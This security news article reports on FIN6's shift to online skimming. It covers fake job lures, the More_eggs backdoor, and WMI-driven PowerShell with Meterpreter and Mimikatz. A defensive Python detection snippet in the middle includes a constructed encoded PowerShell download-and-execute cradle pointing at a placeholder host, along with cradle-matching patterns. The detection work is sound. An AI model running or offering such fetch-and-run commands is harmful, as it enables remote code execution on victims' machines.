The financially motivated attack group known as FIN6 or ITG08, whose primary focus has been point-of-sale (POS) machines at brick-and-mortar retailers and hospitality companies in the U.S. and Europe, has recently shifted its tactics toward e-commerce sites. The development was brought to light by researchers at IBM X-Force Incident Response and Intelligence Services (IRIS), who detected new attacks on e-commerce environments that inject malicious code into the online checkout pages of compromised websites (a technique known as online skimming).
According to IRIS’ analysis, the group actively targets multinational organizations, luring the companies’ employees with spear-phishing emails into downloading the More_eggs JScript backdoor (also known as Terra Loader and SpicyOmelette). The backdoor is sold on the dark web as malware-as-a-service (MaaS); attackers use it to establish, expand and cement their foothold in compromised environments.
Additionally, in the observed attacks FIN6 used tactics well known from its previous campaigns: Windows Management Instrumentation (WMI) to automate the remote execution of PowerShell scripts, base64-encoded PowerShell commands, and Metasploit and PowerShell to move laterally and deploy malware. The attackers also used Comodo code-signing certificates several times during the campaign, according to IRIS.
To gain access to victim environments, FIN6 handpicked employees and approached them through LinkedIn messaging and email, advertising fake jobs.
“In one case, we uncovered evidence indicating that the attacker had established communication with a victim via email and convinced them to click on a Google Drive URL purporting to contain an attractive job advert. Once clicked, the URL displayed the message, ‘Online preview is not available,’ then presented a second URL leading to a compromised or rogue domain, where the victim could download the payload under the guise of a job description,” reads the research.
That URL, in turn, downloaded a ZIP file containing a malicious Windows Script File (WSF) that initiated the infection routine of the More_eggs backdoor, which established a reverse shell connection to the attacker’s command-and-control (C&C) infrastructure. Once the malware was installed on the victim’s system, the ZIP and WSF files were deleted, likely to prevent recovery of the original files from the filesystem, the researchers said.
The More_eggs malware can download and execute other files and scripts, and can run commands via cmd.exe. In this campaign it downloaded a signed binary shellcode loader and a signed Dynamic Link Library (DLL) to create a reverse shell and connect to a remote host. After gaining access to the network, the attackers employed WMI and PowerShell techniques to perform network reconnaissance and move laterally within the environment.
“The attackers used this technique to remotely install a Metasploit reverse TCP stager on select systems, subsequently spawning a Meterpreter session and Mimikatz,” according to the report.
Meterpreter is a payload in the Metasploit Framework that is delivered through in-memory DLL injection, giving an attacker an interactive session from which further malware or malicious code and commands can be run on the compromised host. Mimikatz is a post-exploitation tool that extracts credentials from memory.
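As an added illustration of the WMI-driven, base64-encoded PowerShell execution described above (detection logic written for this article, not code from IBM or the report; the event records, host names and URL are constructed), this Python snippet decodes -EncodedCommand payloads found in process-creation logs and scores instances spawned by WmiPrvSE.exe or carrying a download cradle:

```python
import base64
import re

# Constructed sample process-creation records, shaped like Sysmon Event ID 1 / Windows 4688
# fields. They are built here for illustration and are not indicators from the IBM report.
def _enc(cmd: str) -> str:
    """-EncodedCommand takes base64 of the UTF-16LE command text."""
    return base64.b64encode(cmd.encode("utf-16le")).decode()

SAMPLE_EVENTS = [
    {"host": "ws01", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")},
    {"host": "ws02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -EncodedCommand " + _enc("Get-Date")},
]

# PowerShell accepts abbreviations of -EncodedCommand (-e, -ec, -en, -enc ...).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)[-/]e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
CRADLE = re.compile(r"(?i)DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|Net\.WebClient")

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(events):
    """Flag encoded PowerShell; the score rises for WMI-spawned instances (parent
    WmiPrvSE.exe, the remote-execution pattern above) and for download cradles."""
    findings = []
    for ev in events:
        if not ev["image"].lower().endswith("powershell.exe"):
            continue
        decoded = decode_encoded_command(ev["cmdline"])
        if decoded is None:
            continue
        reasons = ["encoded PowerShell command"]
        if ev["parent"].lower().endswith("wmiprvse.exe"):
            reasons.append("spawned by WMI provider host")
        if CRADLE.search(decoded):
            reasons.append("download cradle in decoded command")
        findings.append({"host": ev["host"], "score": len(reasons),
                         "reasons": reasons, "decoded": decoded})
    return sorted(findings, key=lambda f: f["score"], reverse=True)
```

In a real deployment the parent-process check should be combined with the logon type and source host of the WMI request, since legitimate management tooling also launches PowerShell through WmiPrvSE.exe.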
Once inside the network, the attackers also installed the More_eggs backdoor on several additional devices, creating multiple ways to get back into the network.
A more detailed technical write-up on the More_eggs malware, as well as a list of Indicators of Compromise (IoCs), is provided in IBM’s blog post.